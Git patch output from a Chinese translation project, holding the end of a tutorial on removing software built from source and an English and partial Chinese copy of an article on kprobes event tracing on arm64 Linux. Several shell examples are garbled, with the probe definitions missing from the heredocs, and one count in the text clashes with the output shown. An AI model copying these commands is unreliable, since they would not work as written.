all. - -And if you’ve created links from `/usr/local/bin` you will have to remove them all: - -``` -itsfoss@debian:~/node$ sudo find /usr/local/bin \ - -type l \ - -ilname "/opt/node/*" \ - -print -delete -/usr/local/bin/node -``` - -### Wait? Where was the Dependency Hell? - -As a final comment, if you read about compiling your own custom software, you might have heard about the [dependency hell][27]. This is a nickname for that annoying situation where before being able to successfully compile a software, you must first compile a pre-requisite library, which in its turn requires another library that might in its turn be incompatible with some other software you’ve already installed. - -Part of the job of the package maintainers of your distribution is to actually resolve that dependency hell and to ensure the various software of your system are using compatible libraries and are installed in the right order. - -In that article, I chose on purpose to install NodeJS as it virtually doesn’t have dependencies. I said “virtually” because, in fact, it  _has_  dependencies. But the source code of those dependencies are present in the source repository of the project (in the `node/deps` subdirectory), so you don’t have to download and install them manually before hand. - -But if you’re interested in understanding more about that problem and learn how to deal with it, let me know that using the comment section below: that would be a great topic for a more advanced article! - --------------------------------------------------------------------------------- - -作者简介: - -Engineer by Passion, Teacher by Vocation. My goals : to share my enthusiasm for what I teach and prepare my students to develop their skills by themselves. You can find me on my website as well. - --------------------- - -via: https://itsfoss.com/install-software-from-source-code/ - -作者:[Sylvain Leroux ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://itsfoss.com/author/sylvain/ -[1]:https://itsfoss.com/author/sylvain/ -[2]:https://itsfoss.com/install-software-from-source-code/#comments -[3]:https://www.facebook.com/share.php?u=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3Dfacebook%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare -[4]:https://twitter.com/share?original_referer=/&text=How+to+Install+Software+from+Source+Code%E2%80%A6+and+Remove+it+Afterwards&url=https://itsfoss.com/install-software-from-source-code/%3Futm_source%3Dtwitter%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare&via=Yes_I_Know_IT -[5]:https://plus.google.com/share?url=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3DgooglePlus%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare -[6]:https://www.linkedin.com/cws/share?url=https%3A%2F%2Fitsfoss.com%2Finstall-software-from-source-code%2F%3Futm_source%3DlinkedIn%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare -[7]:https://www.reddit.com/submit?url=https://itsfoss.com/install-software-from-source-code/&title=How+to+Install+Software+from+Source+Code%E2%80%A6+and+Remove+it+Afterwards -[8]:https://itsfoss.com/remove-install-software-ubuntu/ -[9]:https://nodejs.org/en/ -[10]:https://github.com/nodejs/node -[11]:https://en.wikipedia.org/wiki/GitHub -[12]:https://en.wikipedia.org/wiki/Git -[13]:https://en.wikipedia.org/wiki/Version_control -[14]:https://stackoverflow.com/questions/1457103/how-is-a-tag-different-from-a-branch-which-should-i-use-here -[15]:https://en.wikipedia.org/wiki/Graphical_user_interface -[16]:https://en.wikipedia.org/wiki/GNU_Build_System -[17]:https://en.wikipedia.org/wiki/Make_%28software -[18]:https://itsfoss.com/pro-vim-tips/ -[19]:http://www.pathname.com/fhs/ -[20]:https://en.wikipedia.org/wiki/C%2B%2B -[21]:https://en.wikipedia.org/wiki/Compiler -[22]:https://packages.debian.org/sid/build-essential -[23]:https://superuser.com/questions/590808/yum-install-gcc-g-doesnt-work-anymore-in-centos-6-4 -[24]:https://en.wikipedia.org/wiki/List_of_text_editors -[25]:https://github.com/nodejs/node/blob/v8.1.1/src/node.cc#L3830 -[26]:https://en.wikipedia.org/wiki/Environment_variable -[27]:https://en.wikipedia.org/wiki/Dependency_hell From 9d3d033ea5d0e98e24d737ebca3be67533f68980 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Wed, 29 Nov 2017 16:26:16 +0800 Subject: [PATCH 0058/1627] Translating by qhwdw Translating by qhwdw --- sources/tech/20171124 An introduction to the Django ORM.md | 1 + 1 file changed, 1 insertion(+) diff --git a/sources/tech/20171124 An introduction to the Django ORM.md b/sources/tech/20171124 An introduction to the Django ORM.md index 727df3f7b0..4a183ce6c1 100644 --- a/sources/tech/20171124 An introduction to the Django ORM.md +++ b/sources/tech/20171124 An introduction to the Django ORM.md @@ -1,3 +1,4 @@ +Translating by qhwdw An introduction to the Django ORM ============================================================ From 6ad3174ef81a3d86d3d30308987b4ee454858f1d Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Wed, 29 Nov 2017 16:38:02 +0800 Subject: [PATCH 0059/1627] Delete 20161216 Kprobes Event Tracing on ARMv8.md --- ...20161216 Kprobes Event Tracing on ARMv8.md | 334 ------------------ 1 file changed, 334 deletions(-) delete mode 100644 sources/tech/20161216 Kprobes Event Tracing on ARMv8.md diff --git a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md b/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md deleted file mode 100644 index e27290531c..0000000000 --- a/sources/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ /dev/null @@ -1,334 +0,0 @@ -Translating by kimii -# Kprobes Event Tracing on ARMv8 - -![core-dump](http://www.linaro.org/wp-content/uploads/2016/02/core-dump.png) - -### Introduction - -Kprobes is a kernel feature that allows instrumenting the kernel by setting arbitrary breakpoints that call out to developer-supplied routines before and after the breakpointed instruction is executed (or simulated). See the kprobes documentation[[1]][2] for more information. Basic kprobes functionality is selected withCONFIG_KPROBES. Kprobes support was added to mainline for arm64 in the v4.8 release. - -In this article we describe the use of kprobes on arm64 using the debugfs event tracing interfaces from the command line to collect dynamic trace events. This feature has been available for some time on several architectures (including arm32), and is now available on arm64\. The feature allows use of kprobes without having to write any code. - -### Types of Probes - -The kprobes subsystem provides three different types of dynamic probes described below. - -### Kprobes - -The basic probe is a software breakpoint kprobes inserts in place of the instruction you are probing, saving the original instruction for eventual single-stepping (or simulation) when the probe point is hit. - -### Kretprobes - -Kretprobes is a part of kprobes that allows intercepting a returning function instead of having to set a probe (or possibly several probes) at the return points. This feature is selected whenever kprobes is selected, for supported architectures (including ARMv8). - -### Jprobes - -Jprobes allows intercepting a call into a function by supplying an intermediary function with the same calling signature, which will be called first. Jprobes is a programming interface only and cannot be used through the debugfs event tracing subsystem. As such we will not be discussing jprobes further here. Consult the kprobes documentation if you wish to use jprobes. - -### Invoking Kprobes - -Kprobes provides a set of APIs which can be called from kernel code to set up probe points and register functions to be called when probe points are hit. Kprobes is also accessible without adding code to the kernel, by writing to specific event tracing debugfs files to set the probe address and information to be recorded in the trace log when the probe is hit. The latter is the focus of what this document will be talking about. Lastly kprobes can be accessed through the perf command. - -### Kprobes API - -The kernel developer can write functions in the kernel (often done in a dedicated debug module) to set probe points and take whatever action is desired right before and right after the probed instruction is executed. This is well documented in kprobes.txt. - -### Event Tracing - -The event tracing subsystem has its own documentation[[2]][3] which might be worth a read to understand the background of event tracing in general. The event tracing subsystem serves as a foundation for both tracepoints and kprobes event tracing. The event tracing documentation focuses on tracepoints, so bear that in mind when consulting that documentation. Kprobes differs from tracepoints in that there is no predefined list of tracepoints but instead arbitrary dynamically created probe points that trigger the collection of trace event information. The event tracing subsystem is controlled and monitored through a set of debugfs files. Event tracing (CONFIG_EVENT_TRACING) will be selected automatically when needed by something like the kprobe event tracing subsystem. - -#### Kprobes Events - -With the kprobes event tracing subsystem the user can specify information to be reported at arbitrary breakpoints in the kernel, determined simply by specifying the address of any existing probeable instruction along with formatting information. When that breakpoint is encountered during execution kprobes passes the requested information to the common parts of the event tracing subsystem which formats and appends the data to the trace log, much like how tracepoints works. Kprobes uses a similar but mostly separate collection of debugfs files to control and display trace event information. This feature is selected withCONFIG_KPROBE_EVENT. The kprobetrace documentation[[3]][4] provides the essential information on how to use kprobes event tracing and should be consulted to understand details about the examples presented below. - -### Kprobes and Perf - -The perf tools provide another command line interface to kprobes. In particular “perf probe” allows probe points to be specified by source file and line number, in addition to function name plus offset, and address. The perf interface is really a wrapper for using the debugfs interface for kprobes. - -### Arm64 Kprobes - -All of the above aspects of kprobes are now implemented for arm64, in practice there are some differences from other architectures though: - -* Register name arguments are, of course, architecture specific and can be found in the ARM ARM. - -* Not all instruction types can currently be probed. Currently unprobeable instructions include mrs/msr(except DAIF read), exception generation instructions, eret, and hint (except for the nop variant). In these cases it is simplest to just probe a nearby instruction instead. These instructions are blacklisted from probing because the changes they cause to processor state are unsafe to do during kprobe single-stepping or instruction simulation, because the single-stepping context kprobes constructs is inconsistent with what the instruction needs, or because the instruction can’t tolerate the additional processing time and exception handling in kprobes (ldx/stx). -* An attempt is made to identify instructions within a ldx/stx sequence and prevent probing, however it is theoretically possible for this check to fail resulting in allowing a probed atomic sequence which can never succeed. Be careful when probing around atomic code sequences. -* Note that because of the details of Linux ARM64 calling conventions it is not possible to reliably duplicate the stack frame for the probed function and for that reason no attempt is made to do so with jprobes, unlike the majority of other architectures supporting jprobes. The reason for this is that there is insufficient information for the callee to know for certain the amount of the stack that is needed. - -* Note that the stack pointer information recorded from a probe will reflect the particular stack pointer in use at the time the probe was hit, be it the kernel stack pointer or the interrupt stack pointer. -* There is a list of kernel functions which cannot be probed, usually because they are called as part of kprobes processing. Part of this list is architecture-specific and also includes things like exception entry code. - -### Using Kprobes Event Tracing - -One common use case for kprobes is instrumenting function entry and/or exit. It is particularly easy to install probes for this since one can just use the function name for the probe address. Kprobes event tracing will look up the symbol name and determine the address. The ARMv8 calling standard defines where the function arguments and return values can be found, and these can be printed out as part of the kprobe event processing. - -### Example: Function entry probing - -Instrumenting a USB ethernet driver reset function: - -``` -_$ pwd -/sys/kernel/debug/tracing -$ cat > kprobe_events < events/kprobes/enable_ -``` - -At this point a trace event will be recorded every time the driver’s _ax8872_reset()_ function is called. The event will display the pointer to the _usbnet_ structure passed in via X0 (as per the ARMv8 calling standard) as this function’s only argument. After plugging in a USB dongle requiring this ethernet driver we see the following trace information: - -``` -_$ cat trace -# tracer: nop -# -# entries-in-buffer/entries-written: 1/1   #P:8 -# -#                           _—–=> irqs-off -#                          / _—-=> need-resched -#                         | / _—=> hardirq/softirq -#                         || / _–=> preempt-depth -#                         ||| / delay -#        TASK-PID   CPU#  |||| TIMESTAMP  FUNCTION -#           | |    |   ||||    |      | -kworker/0:0-4             [000] d… 10972.102939:   p_ax88772_reset_0: -(ax88772_reset+0x0/0x230)   arg1=0xffff800064824c80_ -``` - -Here we can see the value of the pointer argument passed in to our probed function. Since we did not use the optional labelling features of kprobes event tracing the information we requested is automatically labeled_arg1_.  Note that this refers to the first value in the list of values we requested that kprobes log for this probe, not the actual position of the argument to the function. In this case it also just happens to be the first argument to the function we’ve probed. - -### Example: Function entry and return probing - -The kretprobe feature is used specifically to probe a function return. At function entry the kprobes subsystem will be called and will set up a hook to be called at function return, where it will record the requested event information. For the most common case the return information, typically in the X0 register, is quite useful. The return value in %x0 can also be referred to as _$retval_. The following example also demonstrates how to provide a human-readable label to be displayed with the information of interest. - -Example of instrumenting the kernel __do_fork()_ function to record arguments and results using a kprobe and a kretprobe: - -``` -_$ cd /sys/kernel/debug/tracing -$ cat > kprobe_events < events/kprobes/enable_ -``` - -At this point every call to _do_fork() will produce two kprobe events recorded into the “_trace_” file, one reporting the calling argument values and one reporting the return value. The return value shall be labeled “_pid_” in the trace file. Here are the contents of the trace file after three fork syscalls have been made: - -``` -_$ cat trace -# tracer: nop -# -# entries-in-buffer/entries-written: 6/6   #P:8 -# -#                              _—–=> irqs-off -#                             / _—-=> need-resched -#                            | / _—=> hardirq/softirq -#                            || / _–=> preempt-depth -#                            ||| /     delay -#           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION -#              | |       |   ||||       |         | -              bash-1671  [001] d…   204.946007: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 -              bash-1671  [001] d..1   204.946391: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x724 -              bash-1671  [001] d…   208.845749: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 -              bash-1671  [001] d..1   208.846127: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x725 -              bash-1671  [001] d…   214.401604: p__do_fork_0: (_do_fork+0x0/0x3e4) arg1=0x1200011 arg2=0x0 arg3=0x0 arg4=0x0 arg5=0xffff78b690d0 arg6=0x0 -              bash-1671  [001] d..1   214.401975: r__do_fork_0: (SyS_clone+0x18/0x20 <- _do_fork) pid=0x726_ -``` - -### Example: Dereferencing pointer arguments - -For pointer values the kprobe event processing subsystem also allows dereferencing and printing of desired memory contents, for various base data types. It is necessary to manually calculate the offset into structures in order to display a desired field. - -Instrumenting the `_do_wait()` function: - -``` -_$ cat > kprobe_events < events/kprobes/enable_ -``` - -Note that the argument labels used in the first probe are optional and can be used to more clearly identify the information recorded in the trace log. The signed offset and parentheses indicate that the register argument is a pointer to memory contents to be recorded in the trace log. The “_:u32_” indicates that the memory location contains an unsigned four-byte wide datum (an enum and an int in a locally defined structure in this case). - -The probe labels (after the colon) are optional and will be used to identify the probe in the log. The label must be unique for each probe. If unspecified a useful label will be automatically generated from a nearby symbol name, as has been shown in earlier examples. - -Also note the “_$retval_” argument could just be specified as “_%x0_“. - -Here are the contents of the “_trace_” file after two fork syscalls have been made: - -``` -_$ cat trace -# tracer: nop -# -# entries-in-buffer/entries-written: 4/4   #P:8 -# -#                              _—–=> irqs-off -#                             / _—-=> need-resched -#                            | / _—=> hardirq/softirq -#                            || / _–=> preempt-depth -#                            ||| /     delay -#           TASK-PID   CPU#  ||||    TIMESTAMP  FUNCTION -#              | |       |   ||||       |         | -             bash-1702  [001] d…   175.342074: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xe -             bash-1702  [002] d..1   175.347236: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0x757 -             bash-1702  [002] d…   175.347337: wait_p: (do_wait+0x0/0x260) wo_type=0x3 wo_flags=0xf -             bash-1702  [002] d..1   175.347349: wait_r: (SyS_wait4+0x74/0xe4 <- do_wait) arg1=0xfffffffffffffff6_ -``` - -### Example: Probing arbitrary instruction addresses - -In previous examples we have inserted probes for function entry and exit, however it is possible to probe an arbitrary instruction (with a few exceptions). If we are placing a probe inside a C function the first step is to look at the assembler version of the code to identify where we want to place the probe. One way to do this is to use gdb on the vmlinux file and display the instructions in the function where you wish to place the probe. An example of doing this for the _module_alloc_ function in arch/arm64/kernel/modules.c follows. In this case, because gdb seems to prefer using the weak symbol definition and it’s associated stub code for this function, we get the symbol value from System.map instead: - -``` -_$ grep module_alloc System.map -ffff2000080951c4 T module_alloc -ffff200008297770 T kasan_module_alloc_ -``` - -In this example we’re using cross-development tools and we invoke gdb on our host system to examine the instructions comprising our function of interest: - -``` -_$ ${CROSS_COMPILE}gdb vmlinux -(gdb) x/30i 0xffff2000080951c4 -        0xffff2000080951c4 :    sub    sp, sp, #0x30 -        0xffff2000080951c8 :    adrp    x3, 0xffff200008d70000 -        0xffff2000080951cc :    add    x3, x3, #0x0 -        0xffff2000080951d0 :    mov    x5, #0x713             // #1811 -        0xffff2000080951d4 :    mov    w4, #0xc0              // #192 -        0xffff2000080951d8 : -              mov    x2, #0xfffffffff8000000    // #-134217728 -        0xffff2000080951dc :    stp    x29, x30, [sp,#16]         0xffff2000080951e0 :    add    x29, sp, #0x10 -        0xffff2000080951e4 :    movk    x5, #0xc8, lsl #48 -        0xffff2000080951e8 :    movk    w4, #0x240, lsl #16 -        0xffff2000080951ec :    str    x30, [sp]         0xffff2000080951f0 :    mov    w7, #0xffffffff        // #-1 -        0xffff2000080951f4 :    mov    x6, #0x0               // #0 -        0xffff2000080951f8 :    add    x2, x3, x2 -        0xffff2000080951fc :    mov    x1, #0x8000            // #32768 -        0xffff200008095200 :    stp    x19, x20, [sp,#32]         0xffff200008095204 :    mov    x20, x0 -        0xffff200008095208 :    bl    0xffff2000082737a8 <__vmalloc_node_range> -        0xffff20000809520c :    mov    x19, x0 -        0xffff200008095210 :    cbz    x0, 0xffff200008095234 -        0xffff200008095214 :    mov    x1, x20 -        0xffff200008095218 :    bl    0xffff200008297770 -        0xffff20000809521c :    tbnz    w0, #31, 0xffff20000809524c -        0xffff200008095220 :    mov    sp, x29 -        0xffff200008095224 :    mov    x0, x19 -        0xffff200008095228 :    ldp    x19, x20, [sp,#16]         0xffff20000809522c :    ldp    x29, x30, [sp],#32 -        0xffff200008095230 :    ret -        0xffff200008095234 :    mov    sp, x29 -        0xffff200008095238 :    mov    x19, #0x0               // #0_ -``` - -In this case we are going to display the result from the following source line in this function: - -``` -_p = __vmalloc_node_range(size, MODULE_ALIGN, VMALLOC_START, -VMALLOC_END, GFP_KERNEL, PAGE_KERNEL_EXEC, 0, -NUMA_NO_NODE, __builtin_return_address(0));_ -``` - -…and also the return value from the function call in this line: - -``` -_if (p && (kasan_module_alloc(p, size) < 0)) {_ -``` - -We can identify these in the assembler code from the call to the external functions. To display these values we will place probes at 0xffff20000809520c _and _0xffff20000809521c on our target system: - -``` -_$ cat > kprobe_events < events/kprobes/enable_ -``` - -Now after plugging an ethernet adapter dongle into the USB port we see the following written into the trace log: - -``` -_$ cat trace -# tracer: nop -# -# entries-in-buffer/entries-written: 12/12   #P:8 -# -#                           _—–=> irqs-off -#                          / _—-=> need-resched -#                         | / _—=> hardirq/softirq -#                         || / _–=> preempt-depth -#                         ||| / delay -#        TASK-PID   CPU#  |||| TIMESTAMP  FUNCTION -#           | |    |   ||||    |      | -      systemd-udevd-2082  [000] d… 77.200991: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001188000 -      systemd-udevd-2082  [000] d… 77.201059: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 -      systemd-udevd-2082  [000] d… 77.201115: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001198000 -      systemd-udevd-2082  [000] d… 77.201157: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 -      systemd-udevd-2082  [000] d… 77.227456: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011a0000 -      systemd-udevd-2082  [000] d… 77.227522: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 -      systemd-udevd-2082  [000] d… 77.227579: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011b0000 -      systemd-udevd-2082  [000] d… 77.227635: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 -      modprobe-2097  [002] d… 78.030643: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff2000011b8000 -      modprobe-2097  [002] d… 78.030761: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0 -      modprobe-2097  [002] d… 78.031132: p_0xffff20000809520c: (module_alloc+0x48/0x98) arg1=0xffff200001270000 -      modprobe-2097  [002] d… 78.031187: p_0xffff20000809521c: (module_alloc+0x58/0x98) arg1=0x0_ -``` - -One more feature of the kprobes event system is recording of statistics information, which can be found inkprobe_profile.  After the above trace the contents of that file are: - -``` -_$ cat kprobe_profile - p_0xffff20000809520c                                    6            0 -p_0xffff20000809521c                                    6            0_ -``` - -This indicates that there have been a total of 8 hits each of the two breakpoints we set, which of course is consistent with the trace log data.  More kprobe_profile features are described in the kprobetrace documentation. - -There is also the ability to further filter kprobes events.  The debugfs files used to control this are listed in the kprobetrace documentation while the details of their contents are (mostly) described in the trace events documentation. - -### Conclusion - -Linux on ARMv8 now is on parity with other architectures supporting the kprobes feature. Work is being done by others to also add uprobes and systemtap support. These features/tools and other already completed features (e.g.: perf, coresight) allow the Linux ARMv8 user to debug and test performance as they would on other, older architectures. - -* * * - -Bibliography - -[[1]][5] Jim Keniston, Prasanna S. Panchamukhi, Masami Hiramatsu. “Kernel Probes (Kprobes).” _GitHub_. GitHub, Inc., 15 Aug. 2016\. Web. 13 Dec. 2016. - -[[2]][6] Ts’o, Theodore, Li Zefan, and Tom Zanussi. “Event Tracing.” _GitHub_. GitHub, Inc., 3 Mar. 2016\. Web. 13 Dec. 2016. - -[[3]][7] Hiramatsu, Masami. “Kprobe-based Event Tracing.” _GitHub_. GitHub, Inc., 18 Aug. 2016\. Web. 13 Dec. 2016. - - ----------------- - -作者简介 : [David Long][8]David works as an engineer in the Linaro Kernel - Core Development team. Before coming to Linaro he spent several years in the commercial and defense industries doing both embedded realtime work, and software development tools for Unix. That was followed by a dozen years at Digital (aka Compaq) doing Unix standards, C compiler, and runtime library work. After that David went to a series of startups doing embedded Linux and Android, embedded custom OS's, and Xen virtualization. He has experience with MIPS, Alpha, and ARM platforms (amongst others). He has used most flavors of Unix starting in 1979 with Bell Labs V6, and has been a long-time Linux user and advocate. He has also occasionally been known to debug a device driver with a soldering iron and digital oscilloscope. - --------------------------------------------------------------------------------- - -via: http://www.linaro.org/blog/kprobes-event-tracing-armv8/ - -作者:[ David Long][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:http://www.linaro.org/author/david-long/ -[1]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/# -[2]:https://github.com/torvalds/linux/blob/master/Documentation/kprobes.txt -[3]:https://github.com/torvalds/linux/blob/master/Documentation/trace/events.txt -[4]:https://github.com/torvalds/linux/blob/master/Documentation/trace/kprobetrace.txt -[5]:https://github.com/torvalds/linux/blob/master/Documentation/kprobes.txt -[6]:https://github.com/torvalds/linux/blob/master/Documentation/trace/events.txt -[7]:https://github.com/torvalds/linux/blob/master/Documentation/trace/kprobetrace.txt -[8]:http://www.linaro.org/author/david-long/ -[9]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/#comments -[10]:http://www.linaro.org/blog/kprobes-event-tracing-armv8/# -[11]:http://www.linaro.org/tag/arm64/ -[12]:http://www.linaro.org/tag/armv8/ -[13]:http://www.linaro.org/tag/jprobes/ -[14]:http://www.linaro.org/tag/kernel/ -[15]:http://www.linaro.org/tag/kprobes/ -[16]:http://www.linaro.org/tag/kretprobes/ -[17]:http://www.linaro.org/tag/perf/ -[18]:http://www.linaro.org/tag/tracing/ From 63bee82a62550370735f7533990982ce53a4e92e Mon Sep 17 00:00:00 2001 From: kimii <2545489745@qq.com> Date: Wed, 29 Nov 2017 16:40:41 +0800 Subject: [PATCH 0060/1627] Create 20161216 Kprobes Event Tracing on ARMv8.md --- translated/tech/20161216 Kprobes Event Tracing on ARMv8.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 translated/tech/20161216 Kprobes Event Tracing on ARMv8.md diff --git a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md new file mode 100644 index 0000000000..8b13789179 --- /dev/null +++ b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -0,0 +1 @@ + From aecccb2848d15cb8959862d35b93411ab199638a Mon Sep 17 00:00:00 2001 From: cmn <2545489745@qq.com> Date: Wed, 29 Nov 2017 16:43:38 +0800 Subject: [PATCH 0061/1627] upload translate --- ...20161216 Kprobes Event Tracing on ARMv8.md | 336 ++++++++++++++++++ 1 file changed, 336 insertions(+) diff --git a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md index 8b13789179..d4edaf76bd 100644 --- a/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md +++ b/translated/tech/20161216 Kprobes Event Tracing on ARMv8.md @@ -1 +1,337 @@ +# Kprobes Event Tracing on ARMv8 + +![core-dump](http://www.linaro.org/wp-content/uploads/2016/02/core-dump.png) + +### 介绍 + +Kprobes 是一种内核功能,它允许通过在执行(或模拟)断点指令之前和之后,设置调用开发者提供例程的任意断点来检测内核。可参见 kprobes 文档[[1]][2] 获取更多信息。基本的 kprobes 功能可使用 CONFIG_KPROBEES 来选择。在 arm64 的 v4.8 发行版中, kprobes 支持被添加到主线。 + +在这篇文章中,我们将介绍 kprobes 在 arm64 上的使用,通过在命令行中使用 debugfs 事件追踪接口来收集动态追踪事件。这个功能在一些架构(包括 arm32)上可用已经有段时间,现在在 arm64 上也能使用了。这个功能允许使用 kprobes 而无需编写任何代码。 + +### 探针类型 + +Kprbes 子系统提供了三种不同类型的动态探针,如下所述。 + +### Kprobes + +基本探针是 kprobes 插入的一个软件断点,用以替代你正在探测的指令,当探测点被击中时,它为最终的单步执行(或模拟)保存下原始指令。 + +### Kretprobes + +Kretprobes 是 kprobes 的一部分,它允许拦截返回函数,而不必在返回点设置一个探针(或者可能有多个)。对于支持的架构(包括 ARMv8),只要选择 kprobes,就可以选择此功能。 + +### Jprobes + +Jprobes 允许通过提供一个具有相同调用签名(call signature)的中间函数来拦截对一个函数的调用,这里中间函数将被首先调用。Jprobes 只是一个编程接口,它不能通过 debugfs 事件追踪子系统来使用。因此,我们将不会在这里进一步讨论 jprobes。如果你想使用 jprobes,请参考 kprobes 文档。 + +### 调用 Kprobes + +Kprobes 提供一系列能从内核代码中调用的 API 来设置探测点和当探测点被击中时调用的注册函数。在不往内核中添加代码的情况下,Kprobes 也是可用的,这是通过写入特定事件追踪的 debugfs 文件来实现的,需要在文件中设置探针地址和信息,以便在探针被击中时记录到追踪日志中。后者是本文将要讨论的重点。最后 Kprobes 可以通过 perl 命令来使用。 + +### Kprobes API + +内核开发人员可以在内核中编写函数(通常在专用的调试模块中完成)来设置探测点,并且在探测指令执行前和执行后立即执行任何所需操作。这在 kprobes.txt 中有很好的解释。 + +### 事件追踪 + +事件追踪子系统有自己的自己的文档[[2]][3],对于了解一般追踪事件的背景可能值得一读。事件追踪子系统是追踪点(tracepoints)和 kprobes 事件追踪的基础。事件追踪文档重点关注追踪点,所以请在查阅文档时记住这一点。Kprobes 与追踪点不同的是没有预定义的追踪点列表,而是采用动态创建的用于触发追踪事件信息收集的任意探测点。事件追踪子系统通过一系列 debugfs 文件来控制和监视。事件追踪(CONFIG_EVENT_TRACING)将在被如 kprobe 事件追踪子系统等需要时自动选择。 + +#### Kprobes 事件 + +使用 kprobes 事件追踪子系统,用户可以在内核任意断点处指定要报告的信息,只需要指定任意现有可探测指令的地址以及格式化信息即可确定。在执行过程中遇到断点时,kprobes 将所请求的信息传递给事件追踪子系统的公共部分,这些部分将数据格式化并追加到追踪日志中,就像追踪点的工作方式一样。Kprobes 使用一个类似的但是大部分是独立的 debugfs 文件来控制和显示追踪事件信息。该功能可使用 CONFIG_KPROBE_EVENT 来选择。Kprobetrace文档[[3]][4] 提供了如何使用 kprobes 事件追踪的基本信息,并且应当被参考用以了解以下介绍示例的详细信息。 + +### Kprobes 和 Perf + +Perf 工具为 Kprobes 提供了另一个命令行接口。特别地,“perf probe” 允许探测点除了由函数名加偏移量和地址指定外,还可由源文件和行号指定。Perf 接口实际上是使用 kprobes 的 debugfs 接口的封装器。 + +### Arm64 Kprobes + +上述所有 kprobes 的方面现在都在 arm64 上得到实现,然而实际上与其它架构上的有一些不同: + +* 注册名称参数当然是依架构而特定的,并且可以在 ARM ARM 中找到。 + +* 目前不是所有的指令类型都可被探测。当前不可探测的指令包括 mrs/msr(除了 DAIF 读),异常生成指令,eret 和 hint(除了 nop 变体)。在这些情况下,只探测一个附近的指令来代替是最简单的。这些指令在探测的黑名单里是因为在 kprobes 单步执行或者指令模拟时它们对处理器状态造成的改变是不安全的,这是由于 kprobes 构造的单步执行上下文和指令所需要的不一致,或者是由于指令不能容忍在 kprobes 中额外的处理时间和异常处理(ldx/stx)。 + +* 试图识别在 ldx/stx 序列中的指令并且防止探测,但是理论上这种检查可能会失败,导致允许探测到的原子序列永远不会成功。当探测原子代码序列附近时应该小心。 + +* 注意由于 linux ARM64 调用约定的具体信息,为探测函数可靠地复制栈帧是不可能的,基于此不要试图用 jprobes 这样做,这一点与支持 jprobes 的大多数其它架构不同。这样的原因是被调用者没有足够的信息来确定需要的栈数量。 + +* 注意当探针被击中时,一个探针记录的栈指针信息将反映出使用中的特定栈指针,它是内核栈指针或者中断栈指针。 + +* 有一组内核函数是不能被探测的,通常因为它们作为 kprobes 处理的一部分被调用。这组函数的一部分是依架构特定的,并且也包含如异常入口代码等。 + +### 使用 Kprobes 事件追踪 + +Kprobes 一个常用的例子是检测函数入口和/或出口。因为只需要使用函数名来作为探针地址,它安装探针特别简单。Kprobes 事件追踪将查看符号名称并且确定地址。ARMv8 调用标准定义了函数参数和返回值的位置,并且这些可以作为 kprobes 事件处理的一部分被打印出来。 + +### 例子: 函数入口探测 + +检测 USB 以太网驱动程序复位功能: + +``` +_$ pwd +/sys/kernel/debug/tracing +$ cat > kprobe_events < events/kprobes/enable_ +``` + +此时每次驱动器的 *ax8872_reset()* 函数被调用,追踪事件都将会被记录。这个事件将显示指向通过 作为此函数的唯一参数的 X0(按照 ARMv8 调用标准)传入的 _usbnet_ 结构的指针。插入需要以太网驱动程序的USB加密狗后,我们看见以下追踪信息: + +``` +_$ cat trace +# tracer: nop +# +# entries-in-buffer/entries-written: 1/1 #P:8 +# +# _—–=> irqs-off +# / _—-=> need-resched +# | / _—=> hardirq/softirq +# || / _–=> preempt-depth +# ||| / delay +# TASK-PID CPU# |||| TIMESTAMP FUNCTION +# | | | |||| | | +kworker/0:0-4 [000] d… 10972.102939: p_ax88772_reset_0: +(ax88772_reset+0x0/0x230) arg1=0xffff800064824c80_ +``` + 